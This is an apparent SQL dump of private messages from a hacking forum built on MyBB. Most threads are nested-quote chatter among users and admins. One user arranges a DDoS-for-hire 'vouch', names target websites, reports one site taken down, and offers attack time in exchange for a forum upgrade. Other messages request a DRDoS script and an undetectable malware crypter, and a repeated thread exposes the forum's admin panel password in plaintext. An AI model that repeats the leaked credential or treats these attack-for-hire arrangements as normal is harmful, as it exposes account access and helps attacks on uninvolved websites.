`mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2157', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', 'School, GFX, girls hmm assorted other things. :3 you? [quote=\'t3h jok3r\'] [quote=\'Apathy\'] Ah kk ;) [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'NXK\' pid=\'2530\' dateline=\'1348496037\'] [quote=\'Apathy\' pid=\'2512\' dateline=\'1348457287\'] Awesome about the rewards. I get to give them xD and ya it sucked that we were down. [/quote] Can you atleast attempt to use proper grammer? You\'re an admin, I\'m not trying to be rude but people aren\'t going to take us seriously if you\'re posting so LQ. I\'ve noticed this multiple times. [/quote] I agree man, can you please fix the grammar in posting? [/quote] Sure! [/quote] Thanks also what was your username and password to access ACP? It was something like poopie pipe. I need it again because we are now hosted on 3 servers so if we get DDoSed, I will move to another server. Everything will be perfect but I couldn\'t add your account again because I didn\'t have the password. You can access on this server only. [/quote] It is: Poopipie sosecret32 :P Also when I do make a thread people do not post. :/ [/quote] iTzIpod stays away from hacking and we don\'t have any real hacking section contributor. [/quote] [/quote] So what you up to? [/quote]', '1348889093', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2165', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', 'Is prison break good? [quote=\'t3h jok3r\'] School,Homework, Girls, Website and Prison Break. [quote=\'Apathy\'] School, GFX, girls hmm assorted other things. :3 you? [quote=\'t3h jok3r\'] [quote=\'Apathy\'] Ah kk ;) [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'NXK\' pid=\'2530\' dateline=\'1348496037\'] [quote=\'Apathy\' pid=\'2512\' dateline=\'1348457287\'] Awesome about the rewards. I get to give them xD and ya it sucked that we were down. [/quote] Can you atleast attempt to use proper grammer? You\'re an admin, I\'m not trying to be rude but people aren\'t going to take us seriously if you\'re posting so LQ. I\'ve noticed this multiple times. [/quote] I agree man, can you please fix the grammar in posting? [/quote] Sure! [/quote] Thanks also what was your username and password to access ACP? It was something like poopie pipe. I need it again because we are now hosted on 3 servers so if we get DDoSed, I will move to another server. Everything will be perfect but I couldn\'t add your account again because I didn\'t have the password. You can access on this server only. [/quote] It is: Poopipie sosecret32 :P Also when I do make a thread people do not post. :/ [/quote] iTzIpod stays away from hacking and we don\'t have any real hacking section contributor. [/quote] [/quote] So what you up to? [/quote] [/quote] [/quote]', '1348889503', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2171', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Want that vouch DDoS now?', '0', 'Hey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet.', '1348889905', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2173', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', 'How?:O [quote=\'t3h jok3r\'] Yup and very educational. [quote=\'Apathy\'] Is prison break good? [quote=\'t3h jok3r\'] School,Homework, Girls, Website and Prison Break. [quote=\'Apathy\'] School, GFX, girls hmm assorted other things. :3 you? [quote=\'t3h jok3r\'] [quote=\'Apathy\'] Ah kk ;) [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'NXK\' pid=\'2530\' dateline=\'1348496037\'] [quote=\'Apathy\' pid=\'2512\' dateline=\'1348457287\'] Awesome about the rewards. I get to give them xD and ya it sucked that we were down. [/quote] Can you atleast attempt to use proper grammer? You\'re an admin, I\'m not trying to be rude but people aren\'t going to take us seriously if you\'re posting so LQ. I\'ve noticed this multiple times. [/quote] I agree man, can you please fix the grammar in posting? [/quote] Sure! [/quote] Thanks also what was your username and password to access ACP? It was something like poopie pipe. I need it again because we are now hosted on 3 servers so if we get DDoSed, I will move to another server. Everything will be perfect but I couldn\'t add your account again because I didn\'t have the password. You can access on this server only. [/quote] It is: Poopipie sosecret32 :P Also when I do make a thread people do not post. :/ [/quote] iTzIpod stays away from hacking and we don\'t have any real hacking section contributor. [/quote] [/quote] So what you up to? [/quote] [/quote] [/quote] [/quote] [/quote]', '1348890106', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2507', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey...', '0', 'You guys looking for anymore staff? I am on like almost all the time and as you can see I am very active. I have experience on other forums and shit with moderating and know the everyday tasks. Just wondering if you are...if not it\'s all good. Or if you need anything else like a news team or something like that i\'m down for it :D. I also made a suggestion for a skype group in the general section :D', '1349497074', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2509', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Upgrade', '0', 'http://l33thacking.net/user-225.html Can you upgrade this member to premium hes a very good friend. Ill make sure he\'s HQ.', '1349497104', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2511', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Upgrade', '0', 'http://l33thacking.net/user-225.html Can you upgrade this member to premium hes a very good friend. Ill make sure he\'s HQ.', '1349497105', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2505', '225', '100', '225', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Ello!', '0', 'Eyy ima friend of NXK, and i was wondering if you could hook me up with that drdos script. thanks in advance', '1349497061', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2183', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] Hey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet. [/quote] Sure and how about elitelobby.com? [/quote] Well I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security.', '1348890674', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2185', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', 'Maybe tomorrow I am going to hit the sack in a bit. [quote=\'t3h jok3r\'] Can\'t spoil the suspense :) Here\'s the link I use http://www.free-tv-video-online.me/internet/prison_break/ [quote=\'Apathy\'] How?:O [quote=\'t3h jok3r\'] Yup and very educational. [quote=\'Apathy\'] Is prison break good? [quote=\'t3h jok3r\'] School,Homework, Girls, Website and Prison Break. [quote=\'Apathy\'] School, GFX, girls hmm assorted other things. :3 you? [quote=\'t3h jok3r\'] [quote=\'Apathy\'] Ah kk ;) [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'NXK\' pid=\'2530\' dateline=\'1348496037\'] [quote=\'Apathy\' pid=\'2512\' dateline=\'1348457287\'] Awesome about the rewards. I get to give them xD and ya it sucked that we were down. [/quote] Can you atleast attempt to use proper grammer? You\'re an admin, I\'m not trying to be rude but people aren\'t going to take us seriously if you\'re posting so LQ. I\'ve noticed this multiple times. [/quote] I agree man, can you please fix the grammar in posting? [/quote] Sure! [/quote] Thanks also what was your username and password to access ACP? It was something like poopie pipe. I need it again because we are now hosted on 3 servers so if we get DDoSed, I will move to another server. Everything will be perfect but I couldn\'t add your account again because I didn\'t have the password. You can access on this server only. [/quote] It is: Poopipie sosecret32 :P Also when I do make a thread people do not post. :/ [/quote] iTzIpod stays away from hacking and we don\'t have any real hacking section contributor. [/quote] [/quote] So what you up to? [/quote] [/quote] [/quote] [/quote] [/quote] [/quote] [/quote]', '1348890755', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2190', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] Hey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet. [/quote] Sure and how about elitelobby.com? [/quote] Well I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security. [/quote] Sure http://www.nintendolounge.com/ [/quote] Down as of 12:23 PM EST', '1348892612', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2192', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] Hey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet. [/quote] Sure and how about elitelobby.com? [/quote] Well I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security. [/quote] Sure http://www.nintendolounge.com/ [/quote] http://i.imgur.com/CWBFc.png', '1348892807', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2790', '3', '203', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: Why?', '0', '[quote=\'NeonLights\'] [quote=\'??????????¢™\'] [quote=\'NeonLights\'] [quote=\'??????????¢™\'] Why do you not like me? I am no longer bitchy. I was only bitchy because I got demoted for nothing but then found out it was the system so I felt stupid so yea. [/quote] hmm :/ i still think u should be a daily hq poster to deserve the slitest spot on this forum but like i said i dont decide [/quote] Well I still love you NO HOMO [/quote] same :) just be more active :/ il remove my rep [/quote] I am trying to be as active as I can be.', '1349738295', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2645', '222', '61', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'hey bro....', '0', 'Hey I got a skype group going with a bunch of LH members...would you like to be apart of it? If so just add me on skype: flamingworm', '1349659746', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2647', '61', '222', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Re: hey bro....', '0', '[quote=\'flamingworm\'] Hey I got a skype group going with a bunch of LH members...would you like to be apart of it? If so just add me on skype: flamingworm [/quote] Sure. Adding now.', '1349660235', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3229', '3', '100', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', '[All Members] Advance Member System', '0', 'Here you go, Enjoy http://www.mediafire.com/download.php?hny4mxznomkje5t Please vouch', '1350358061', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2643', '243', '214', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"214\";}}', '2', 'Join us.', '0', 'Did you know the site owner is a scammer? http://www.anarchyforums.net/Thread-L33thacking-net?action=lastpost', '1349659142', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2219', '205', '203', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: WHATS UP :D', '0', '[quote=\'NeonLights\'] Hey what up... im bored [/quote] Hey mate, not much, just very busy with all my computational stuff and my site. Going offline from here In 5 or so minutes... Hope you\'re keeping well :)', '1348961000', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2221', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] Hey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet. [/quote] Sure and how about elitelobby.com? [/quote] Well I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security. [/quote] Sure http://www.nintendolounge.com/ [/quote] Down as of 12:23 PM EST [/quote] Done. [/quote] ;D', '1348961340', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2224', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] Hey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet. [/quote] Sure and how about elitelobby.com? [/quote] Well I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security. [/quote] Sure http://www.nintendolounge.com/ [/quote] Down as of 12:23 PM EST [/quote] Done. [/quote] ;D [/quote] Good Luck with the sales. [/quote] Thanks!', '1348961814', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2227', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] Hey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet. [/quote] Sure and how about elitelobby.com? [/quote] Well I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security. [/quote] Sure http://www.nintendolounge.com/ [/quote] Down as of 12:23 PM EST [/quote] Done. [/quote] ;D [/quote] Good Luck with the sales. [/quote] Thanks! [/quote] No problem. [/quote] You wouldn\'t happen to have a FUD Crypter? Chrome isn\'t working for me, I think you shared one called Razor Crypter? I like that a lot but sadly it does not have a Spoofer or Binder.', '1348961998', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2230', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] Hey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet. [/quote] Sure and how about elitelobby.com? [/quote] Well I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security. [/quote] Sure http://www.nintendolounge.com/ [/quote] Down as of 12:23 PM EST [/quote] Done. [/quote] ;D [/quote] Good Luck with the sales. [/quote] Thanks! [/quote] No problem. [/quote] You wouldn\'t happen to have a FUD Crypter? Chrome isn\'t working for me, I think you shared one called Razor Crypter? I like that a lot but sadly it does not have a Spoofer or Binder. [/quote] Nope, my PC broke down so I\'m buying a new one. [/quote] That sucks. Good luck. Also, if you ever want a website taken down, I\'ll trade you one hour and 15 minutes of a DDoS attack on the site you would like for the elite upgrade ;D', '1348962313', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2233', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] Hey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet. [/quote] Sure and how about elitelobby.com? [/quote] Well I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security. [/quote] Sure http://www.nintendolounge.com/ [/quote] Down as of 12:23 PM EST [/quote] Done. [/quote] ;D [/quote] Good Luck with the sales. [/quote] Thanks! [/quote] No problem. [/quote] You wouldn\'t happen to have a FUD Crypter? Chrome isn\'t working for me, I think you shared one called Razor Crypter? I like that a lot but sadly it does not have a Spoofer or Binder. [/quote] Nope, my PC broke down so I\'m buying a new one. [/quote] That sucks. Good luck. Also, if you ever want a website taken down, I\'ll trade you one hour and 15 minutes of a DDoS attack on the site you would like for the elite upgrade ;D [/quote] Cool, BTW I thought you had a free upgrade right? [/quote] I did?!', '1348963091', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2236', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] Hey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet. [/quote] Sure and how about elitelobby.com? [/quote] Well I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security. [/quote] Sure http://www.nintendolounge.com/ [/quote] Down as of 12:23 PM EST [/quote] Done. [/quote] ;D [/quote] Good Luck with the sales. [/quote] Thanks! [/quote] No problem. [/quote] You wouldn\'t happen to have a FUD Crypter? Chrome isn\'t working for me, I think you shared one called Razor Crypter? I like that a lot but sadly it does not have a Spoofer or Binder. [/quote] Nope, my PC broke down so I\'m buying a new one. [/quote] That sucks. Good luck. Also, if you ever want a website taken down, I\'ll trade you one hour and 15 minutes of a DDoS attack on the site you would like for the elite upgrade ;D [/quote] Cool, BTW I thought you had a free upgrade right? [/quote] I did?! [/quote] I thought. Not sure. Well umm if you get the upgrade, what will you do for me? I don\'t want the DDoS. [/quote] Oh erm, I don\'t really know then. xD Thats my only service.', '1348963702', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2786', '3', '203', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: Why?', '0', '[quote=\'NeonLights\'] [quote=\'??????????¢™\'] Why do you not like me? I am no longer bitchy. I was only bitchy because I got demoted for nothing but then found out it was the system so I felt stupid so yea. [/quote] hmm :/ i still think u should be a daily hq poster to deserve the slitest spot on this forum but like i said i dont decide [/quote] Well I still love you NO HOMO', '1349737908', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2241', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] Hey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet. [/quote] Sure and how about elitelobby.com? [/quote] Well I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security. [/quote] Sure http://www.nintendolounge.com/ [/quote] Down as of 12:23 PM EST [/quote] Done. [/quote] ;D [/quote] Good Luck with the sales. [/quote] Thanks! [/quote] No problem. [/quote] You wouldn\'t happen to have a FUD Crypter? Chrome isn\'t working for me, I think you shared one called Razor Crypter? I like that a lot but sadly it does not have a Spoofer or Binder. [/quote] Nope, my PC broke down so I\'m buying a new one. [/quote] That sucks. Good luck. Also, if you ever want a website taken down, I\'ll trade you one hour and 15 minutes of a DDoS attack on the site you would like for the elite upgrade ;D [/quote] Cool, BTW I thought you had a free upgrade right? [/quote] I did?! [/quote] I thought. Not sure. Well umm if you get the upgrade, what will you do for me? I don\'t want the DDoS. [/quote] Oh erm, I don\'t really know then. xD Thats my only service. [/quote] Be active and contribute daily. [/quote] Sounds good.', '1348968598', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2247', '100', '1', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Want that vouch DDoS now?', '0', '[quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] [quote=\'t3h jok3r\'] [quote=\'GRONgamer61\'] Hey you still want that vouch copy of my service? theprofiters.com is a VERY heavily protected site, I asked some guys I know about it and its virtually impossible to take down unless you were using a giant botnet. [/quote] Sure and how about elitelobby.com? [/quote] Well I just tested and its using a proxy redirect DDoS protection method. The proxy is taking 9.3GB per/s. Do you have anything that isn\'t affiliated with hacking? xD Hackers tend to be up to date on internet protection and security. [/quote] Sure http://www.nintendolounge.com/ [/quote] Down as of 12:23 PM EST [/quote] Done. [/quote] ;D [/quote] Good Luck with the sales. [/quote] Thanks! 